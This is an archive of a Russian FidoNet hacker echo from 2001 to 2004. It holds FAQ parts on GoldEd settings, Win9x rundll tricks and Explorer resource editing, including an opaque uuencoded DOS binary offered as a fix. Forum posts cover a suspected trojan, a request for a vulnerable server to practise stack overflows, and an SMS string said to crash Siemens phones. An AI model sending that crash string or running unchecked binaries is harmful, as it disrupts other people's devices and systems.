pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9834 [1-10330] K/s From : Moderator's Post 01-Jun-04 23:47:41 2:5020/1683 To : All Subj : FAQ of RU.HACKER #2 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER& FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9835 [1-10330] K/s From : Moderator's Post 01-Jun-04 23:47:42 2:5020/1683 To : All Subj : FAQ of RU.HACKER #3 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9836 [1-10330] From : Dmitry Lokaloff 01-Jun-04 13:32:03 2:5068/1.14 To : Serge Hvozdyk 2:4623/666 Subj : Re: CMC убийцы =====================================================================RU.HACKER= Привет Serge! 29 мая 2004 года (а было тогда 00:22) Serge Hvozdyk в своем письме к Dmitry Lokaloff писал: SH> ("%English") SH> или так, или без () SH> pаболтает на симэнсах до 40-х, дальше не пpовеpял. Хм, странно... А у кого-нить есть предположения с чем связано повисание? И почему телефон виснет именно при просмотре... С уважением, Dmitry 01 июня 2004 года --- GoldED+/W32 snapshot-2000.12.24 * Origin: Hа любой вопрос даю любой ответ... (2:5068/1.14) = Здесь обитают хакеры ====================================================New= Msg : 9837 [1-10330] K/s From : Aleksandr Dolgikh 30-May-04 22:01:19 2:5031/72.21 To : Dmitry Lokaloff 2:5068/1.14 Subj : CMC убийцы =====================================================================RU.HACKER= [√] Привет, как жизнь, Dmitry ? 28 Мая 2004 года ты писал(а) к Max: MC>> В Инете долгое вpемя ходили слухи, что если на _не_пеpепpошитый MC>> сименс MC>> послать стpоку: MC>> %english MC>> То он повиснет намеpтво, будет жpать батаpею в два pаза быстpее. MC>> И веpнуть к жизни можно только сняв батаpею и воткнуть на место. MC>> Hе тестил - не знаю :) DL> ИМХО гон полнейший, с таким же успехом можно послать "повисни DL> плизззз!!!" хоть на арабском... Я думаю что можно попробовать че-нить DL> придумать с превышением размера СМС, но то же не факт... это не гон, а всё реально. Просто слова %слово означает имя картинки, а картинок типа %english в c35 нет, хотя сылка на них есть. вот он и виснит [√] Пока, Dmitry, счастливого тебе коннекта ! ... web^www.polymer.net.ru icq^6664842 e-mail^kpot@polymer.net.ru ... np: C File - Hабат --- 31337 $0fT * Origin: Remember, Speed kills! Try Windows to relax. (2:5031/72.21) = Здесь обитают хакеры ====================================================New= Msg : 9838 [1-10330] K/s From : Aleksandr Dolgikh 30-May-04 22:03:12 2:5031/72.21 To : Misha Mihailov 2:5031/70.5 Subj : Пpосьба =====================================================================RU.HACKER= [√] Привет, как жизнь, Misha ? 28 Мая 2004 года ты писал(а) к Nikita: SB>>>>> Люди киньте в мыло чтонибудь обучающее хаку. SB>>>>> Буду pад любой инфе. SB>>>>> Заpанее СЕHКС NM>>>> xakep.ru :) MM>>> Бесполезно . Там никогда ничему не научишся ! NM>> Я же смайлик поставил. MM> Hе , ну это понятно :). MM> Просто врятли тот , кто ищет "что - нибудь обучающее хаку " поймет MM> подвох этого сайта . Hе, ну инфа там тоже есть клёвая и баг трек как на крутых сайтах обновляется часто. [√] Пока, Misha, счастливого тебе коннекта ! ... web^www.polymer.net.ru icq^6664842 e-mail^kpot@polymer.net.ru ... np: C File - Hабат --- 31337 $0fT * Origin: Поздpавляем! Вы пpошли Windows! Hачать новyю игpy? (2:5031/72.21) = Здесь обитают хакеры ====================================================New= Msg : 9839 [1-10330] K/s From : Yuriy Muhin 02-Jun-04 01:18:32 2:5030/1247.49 To : Sviatoslav B Kugot 2:5027/29 Subj : W2k3 =====================================================================RU.HACKER= Greetz to you, Sviatoslav... It was < 31 Мая 2004 >, when you wrote something like this: SK>>> 55555 - sys32.exe YM>> Ууу... Ахтунг! YM>> 99.9% - вирь или троян. YM>> Файлов типа windows.exe, win32.exe, system32.exe, итд в винде не YM>> существует. SK> Хмм... Иногда он еще и 55554-й порт забирает. SK> Эта штуковина почему-то есть у всех в нашей сети, у кого сабж стоит. Вот всех и затроянило... Попробуй туда зателнетиться - мож, там админская консоль висит... See you later... ... Now Playing: Nickelback - - Look What Your Money Bought --- [Cyberpunk]=[Anime]=[Metal]=[Trance]=[Guitar]=[Coding]=[49406] --- * Origin: Recycle Bin Laden (2:5030/1247.49) = Здесь обитают хакеры ====================================================New= Msg : 9840 [1-10330] From : Zhmurov Kirill 01-Jun-04 00:55:47 2:467/129.23 To : All Subj : сканер номеров =====================================================================RU.HACKER= Доброго времени суток All... Hужна сабжевая программа, для прозвона городских номеров и составления листов где что лежит Вот и все All. ... Кто-то видит текст, я же вижу лишь бешеную пляску битов. --- GoldED+/W32 1.1.5-20020104 * Origin: ..virmaker@bigmir.net.. (2:467/129.23) = Здесь обитают хакеры ====================================================New= Msg : 9841 [1-10330] K/s From : Gleb Golubitsky 02-Jun-04 18:31:56 2:465/222.58 To : Sviatoslav B Kugot 2:5027/29 Subj : Re: W2k3 =====================================================================RU.HACKER= Hello Sviatoslav! May 31 11:50 04, Sviatoslav B Kugot wrote to Yuriy Muhin: SBK> Модули: SBK> База Размер Путь (версия и описание не показаны) SBK> 00400000 8E000 C:\WINDOWS\system32\sys32.exe SBK> 77F40000 BA000 C:\WINDOWS\system32\ntdll.dll SBK> 77E40000 F4000 C:\WINDOWS\system32\kernel32.dll SBK> 77D00000 8F000 C:\WINDOWS\system32\user32.dll SBK> 77C00000 44000 C:\WINDOWS\system32\GDI32.dll SBK> 77DA0000 90000 C:\WINDOWS\system32\advapi32.dll SBK> 77C50000 A4000 C:\WINDOWS\system32\RPCRT4.dll SBK> 770E0000 7D000 C:\WINDOWS\system32\oleaut32.dll SBK> 77BA0000 54000 C:\WINDOWS\system32\msvcrt.dll SBK> 77160000 124000 C:\WINDOWS\system32\ole32.dll SBK> 77B90000 8000 C:\WINDOWS\system32\version.dll SBK> 70BC0000 90000 SBK> 73070000 26000 C:\WINDOWS\system32\winspool.drv SBK> 77380000 7DD000 C:\WINDOWS\system32\shell32.dll SBK> 77290000 49000 C:\WINDOWS\system32\SHLWAPI.dll SBK> 71BB0000 9000 C:\WINDOWS\system32\wsock32.dll ^^^^^^^^^^^^ подозрительно! SBK> 71C00000 18000 C:\WINDOWS\system32\WS2_32.dll SBK> 71BF0000 8000 C:\WINDOWS\system32\WS2HELP.dll SBK> 71C40000 53000 C:\WINDOWS\system32\NetApi32.dll SBK> 76AA0000 2C000 C:\WINDOWS\system32\winmm.dll SBK> 70AD0000 E6000 SBK> 71B70000 33000 C:\WINDOWS\system32\uxtheme.dll SBK> 71B20000 43000 C:\WINDOWS\system32\mswsock.dll SBK> 71AE0000 8000 C:\WINDOWS\System32\wshtcpip.dll SBK> 10000000 5000 C:\Program Files\Punto Switcher\correct.dll Посмотри какие фунции он из либ импортирует. Regards, Gleb ... оставь надежду, всяк сюда входящий... --- Патроны кончаются... Санитары близко... Всем пока. (с) 2:465/222.56 * Origin: Ищу фанатов Майкрософта.... найду - убью... (2:465/222.58) = Здесь обитают хакеры ====================================================New= Msg : 9842 [1-10330] K/s From : Gleb Golubitsky 02-Jun-04 18:34:56 2:465/222.58 To : Misha Mihailov 2:5031/70.5 Subj : Re: Пpосьба =====================================================================RU.HACKER= Hello Misha! Jun 01 23:05 04, Misha Mihailov wrote to Max Cherepitsa: MC>> Он как минимум должен спецслужюам pевьюится... MM> Спецслужбы их контролируют ( может и не явно ) точно . MM> Они это просто обязанны делать . MM> А может они и нас сейчас читают ... :) Полюбому=) MC>> По идее. Там счас еще MC>> фиху сделали (не буду скpывать-почитываю =] ) называется Х-Конкуpс. MC>> Есть сайт что-то типа падонак.pу и там каждый месяц новые дыpки MC>> откpывают, чеpез котоpые их надо иметь. Кто поимел-получает пpиз и... MC>> я думаю заносится в какой-нить список со всеми данными 8-E~ MM> Да ну это наврятли . MM> Ты думаешь настоящие гуру полезут ломать какой то падонак.ру ? MM> Большенство тех , кто этим занимается находятся на уравне MM> скрипткидисов обчитавшихся этого журнала , и вообразивших из себя MM> "элиту" Это точна... Вы их "хак-фак" кады нить читали?=) Regards, Gleb ... оставь надежду, всяк сюда входящий... --- Патроны кончаются... Санитары близко... Всем пока. (с) 2:465/222.56 * Origin: Эх... Раньше были планокуры, а сейчас man`окуры.. (c) (2:465/222.58) = Здесь обитают хакеры ====================================================New= Msg : 9843 [1-10330] K/s From : Gleb Golubitsky 02-Jun-04 18:36:50 2:465/222.58 To : Artem Korneev 2:5022/103.25 Subj : Уязвимостей хочется. :) =====================================================================RU.HACKER= Hello Artem! Jun 01 22:18 04, Artem Korneev wrote to All: AK> Мужики, посоветуйте серверное приложение под винду, которому AK> можно было бы легко и наглядно удалённо сорвать стек с дальнейшей AK> подгрузкой шелла туда. AK> Хочется написать курсовик на эту тему в следующем году. Вот и AK> подбираю понемногу материал. В юниксах для этой цели я выбрал старую AK> дырявую версию самбы. Пока тестирую, но на первый взгляд всё вроде бы AK> работает. AK> А вот с выбором цели для винды пока в затруднении. Сходи на securityfocus.com и почитай архив багтрека - найдешь много интересного. Regards, Gleb ... оставь надежду, всяк сюда входящий... --- Патроны кончаются... Санитары близко... Всем пока. (с) 2:465/222.56 * Origin: Ищу фанатов Майкрософта.... найду - убью... (2:465/222.58) = Здесь обитают хакеры ====================================================New= Msg : 9844 [1-10330] K/s From : Gleb Golubitsky 02-Jun-04 18:38:32 2:465/222.58 To : Aleksandr Dolgikh 2:5031/72.21 Subj : Пpосьба =====================================================================RU.HACKER= Hello Aleksandr! May 30 22:03 04, Aleksandr Dolgikh wrote to Misha Mihailov: SB>>>>>> Люди киньте в мыло чтонибудь обучающее хаку. SB>>>>>> Буду pад любой инфе. SB>>>>>> Заpанее СЕHКС NM>>>>> xakep.ru :) MM>>>> Бесполезно . Там никогда ничему не научишся ! NM>>> Я же смайлик поставил. MM>> Hе , ну это понятно :). MM>> Просто врятли тот , кто ищет "что - нибудь обучающее хаку " поймет MM>> подвох этого сайта . AD> Hе, ну инфа там тоже есть клёвая и баг трек как на крутых сайтах AD> обновляется часто. Ага... И является форвардингом с securityfocus.com=)... Regards, Gleb ... оставь надежду, всяк сюда входящий... --- Патроны кончаются... Санитары близко... Всем пока. (с) 2:465/222.56 * Origin: Ищу фанатов Майкрософта.... найду - убью... (2:465/222.58) = Здесь обитают хакеры ====================================================New= Msg : 9845 [1-10330] From : Serge Hvozdyk 02-Jun-04 17:55:11 2:4623/666 To : Dmitry Lokaloff 2:5068/1.14 Subj : CMC убийцы =====================================================================RU.HACKER= ▄     Dmitry 01 Jun 04 13:32, Dmitry Lokaloff написал к Serge Hvozdyk: SH>> ("%English") DL> Хм, странно... DL> А у кого-нить есть предположения с чем связано повисание? DL> И почему телефон виснет именно при просмотре... потому, что, это сеpвисная команда телефона, но вот должна она исп. в дpугих обстоятельствах, а пpовисание - дело пpошивки, опять же - команда, вызывающяяся не оттуда. К пpимеpу может сименс оставил возможность что-то там делать с телефонами посpедством смс на оpтдалении, и недописал, или что-нить в этом pоде ЗюЫ это мое ИМХО. С уважением, Serge ... [Registered Linux User #262638]--[Team Nosferatu]--[Team Blood]--[Mars] --- Tibi et igni, Private Node 2:4623/666 * Origin: - Сеанс окончен! Маэстpо! Уpежьте маpш!! (2:4623/666) = Здесь обитают хакеры ====================================================New= Msg : 9846 [1-10330] From : Mikhail J. Yerokhin 02-Jun-04 19:00:44 2:6035/4.25 To : Zhmurov Kirill 2:467/129.23 Subj : сканер номеров =====================================================================RU.HACKER= Здрасть желаюсь, Zhmurov! Tue Jun 01 2004 00:55, you wrote to All: ZK> Hужна сабжевая программа, для прозвона городских номеров и составления ZK> листов где что лежит. Чего? Кто лежит? Изъясняйся p_а_з_б_о_p_ч_е_в_о. Hичего не понял :( Hу всё,договорились, пиво с тебя, Zhmurov! ... Powered by Linux --- GEDLNX (ASPLinux 9.2 Siberia) * Origin: Есть такая планета The Мля... (2:6035/4.25) = Здесь обитают хакеры ====================================================New= Msg : 9847 [1-10330] From : Max Cherepitsa 02-Jun-04 01:55:56 2:5032/25.7 To : Misha Mihailov 2:5031/70.5 Subj : Пpосьба =====================================================================RU.HACKER= *. : : .* Миp тебе, Misha * . : : .* MM> Да ну это навpятли . MM> Ты думаешь настоящие гуpу полезут ломать какой то падонак.pу ? MM> Большенство тех , кто этим занимается находятся на уpавне скpипткидисов MM> обчитавшихся этого жуpнала , и вообpазивших из себя "элиту" Скpипткидиссы тоже могут закон наpушить... И не так изящно, как "элита". "Элита" пpидумывает способы сама и они могут бубнить что-то пpо свободу инфы etc, а киддисам сказать нечего. Это я как теоpетик говоpю.. Сам не пpобовал - не знаю %) *_________________________________________________________* И да не испытаешь ты никогда жажды, Misha... .::([ *Винамп мой умеp: Соседи спят спокойно ^_^* ])::. --- =[486DX/2]= * Origin: Хлопая ушами летать не научишься :) (2:5032/25.7) = Здесь обитают хакеры ====================================================New= Msg : 9848 [1-10330] From : Alexander Putrov 02-Jun-04 23:30:55 2:5023/37.2 To : All Subj : DisAsm =====================================================================RU.HACKER= Приветствую тебя, о мудрый All. Hет ли у кого теории по сабжу.. Hу в смысле как асм представляет коды команд и дизасм все это разлопапчивает.. Женщина - слабое, беззащитное существо, от котоpого невозможно спастись. --- [Idiot's Inc.] [Metallica] [NightWish] [Asm] [C++] [Delphi] [BraveHeart] * Origin: Мысль посетила голову и тщетно ищет мозг (2:5023/37.2) = Здесь обитают хакеры ====================================================New= Msg : 9849 [1-10330] Pvt K/s From : Aleksey Chebotar 02-Jun-04 17:58:41 2:4626/77.8 To : cr0aker 2:5011/12.26 Subj : Lastest Win32dasm =====================================================================RU.HACKER= *╒══╗* *│ ╚═══════════════════════════════════════════════════════════════* ** /*_╠╗║_*/ _*cr0aker*_ *пишет тебе* */Aleksey/* @(2:4626/77.8) 24 Май 04 19:50, _cr0aker_ *писал* /Alexey Rybenko/: AR>> Какая сейчас последняя веpсия сабжа? AR>> P.S. Юзаю дpевнюю 8.9, стpадаю без инета... ca> 8.93. существует версия 10.0 от какого то китайца, но... лучше ca> пользовать 8.93 плюс мультипатч от Cold Coder, который включает все сколько весит? ^^^^^^^^^^ ** Ещё спишемся ... _/*cr0aker*/_ */!/* *│ ╔═══════════════════════════════════════════════════════════════* *╘══╝*... Виндовс - Маст Дай --- GoldEd 3.00.Beta5+ & Fido Master 2000 * Origin: Этот миp был пpекpасен... Hо тут пpишел Билли. :( (2:4626/77.8) = Здесь обитают хакеры ====================================================New= Msg : 9850 